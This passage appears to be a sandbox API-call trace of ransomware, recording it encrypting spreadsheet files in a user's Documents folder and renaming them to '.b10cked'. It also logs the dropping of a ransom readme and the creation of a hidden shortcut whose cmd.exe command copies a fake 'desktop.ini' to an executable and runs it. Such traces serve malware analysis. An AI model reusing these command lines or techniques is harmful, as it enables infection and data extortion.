lpWideCharStr="\x72\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x42\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0131.221] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0131.221] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0131.221] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0131.221] CharUpperBuffW (in: lpsz="explorer.exe \"fcfnnEKYsCveHRXmenn\" & type \"fcfnnEKYsCveHRXmenn\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x77 | out: lpsz="EXPLORER.EXE \"FCFNNEKYSCVEHRXMENN\" & TYPE \"FCFNNEKYSCVEHRXMENN\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x77 [0131.221] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0131.221] CharUpperBuffW (in: lpsz="explorer.exe \"fcfnnEKYsCveHRXmenn\" & type \"fcfnnEKYsCveHRXmenn\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x78 | out: lpsz="EXPLORER.EXE \"FCFNNEKYSCVEHRXMENN\" & TYPE \"FCFNNEKYSCVEHRXMENN\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x78 [0131.221] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0131.221] CoInitialize (pvReserved=0x0) returned 0x0 [0131.221] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0131.223] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0131.223] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0131.223] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0131.225] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"fcfnnEKYsCveHRXmenn\" & type \"fcfnnEKYsCveHRXmenn\\desktop.ini\" > \"%TEMP%\\GLtsrNBw.exe\" && \"%TEMP%\\GLtsrNBw.exe\"") returned 0x0 [0131.225] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0131.225] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0131.225] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0131.225] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn.lnk", fRemember=0) returned 0x0 [0131.233] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0131.233] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0131.233] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0131.233] CoUninitialize () [0131.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.234] ReleaseMutex (hMutex=0xf8) returned 1 [0131.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.234] ReleaseMutex (hMutex=0xf8) returned 1 [0131.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.234] ReleaseMutex (hMutex=0xf8) returned 1 [0131.234] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.234] ReleaseMutex (hMutex=0xf8) returned 1 [0131.234] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\gjVvzAf3d4AVCevrZIj.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\gjvvzaf3d4avcevrzij.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0131.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.234] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18802357866) returned 1 [0131.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x6b8c [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b8c [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.236] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x66a4 [0131.236] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0131.237] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0131.237] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.237] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x6b8c [0131.237] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.237] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0131.237] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.238] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x6b8c [0131.238] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.238] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.238] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x35c5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x35c5, lpOverlapped=0x0) returned 1 [0131.238] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.238] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x35c5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x35c5, lpOverlapped=0x0) returned 1 [0131.238] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13765, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x35c7 [0131.238] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x35c5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x35c5, lpOverlapped=0x0) returned 1 [0131.238] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13765, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x35c7 [0131.239] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x35c5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x35c5, lpOverlapped=0x0) returned 1 [0131.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gjVvzAf3d4AVCevrZIj.xlsx", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0131.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gjVvzAf3d4AVCevrZIj.xlsx", cchWideChar=24, lpMultiByteStr=0x132f7bc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gjVvzAf3d4AVCevrZIj.xlsx", lpUsedDefaultChar=0x0) returned 24 [0131.244] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x6b8c [0131.244] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0131.244] CloseHandle (hObject=0x114) returned 1 [0131.245] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\gjVvzAf3d4AVCevrZIj.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS") returned 0x26 [0131.245] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0131.245] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xa50, dwThreadId=0x9a4)) returned 1 [0131.247] CloseHandle (hObject=0x110) returned 1 [0131.247] CloseHandle (hObject=0x114) returned 1 [0131.247] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0131.247] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0131.247] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 1 [0131.247] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0131.247] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0131.247] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0131.247] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0131.248] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0131.248] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0131.248] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0131.248] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0131.248] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0131.248] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x994, dwThreadId=0x998)) returned 1 [0131.249] CloseHandle (hObject=0x110) returned 1 [0131.250] CloseHandle (hObject=0x114) returned 1 [0131.250] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0x20 [0131.250] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0131.250] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0131.250] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0131.250] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.250] ReleaseMutex (hMutex=0xf8) returned 1 [0131.250] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.250] ReleaseMutex (hMutex=0xf8) returned 1 [0131.250] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.250] ReleaseMutex (hMutex=0xf8) returned 1 [0131.250] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.250] ReleaseMutex (hMutex=0xf8) returned 1 [0131.250] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Muum.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\muum.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18803989747) returned 1 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x14b7a [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.251] 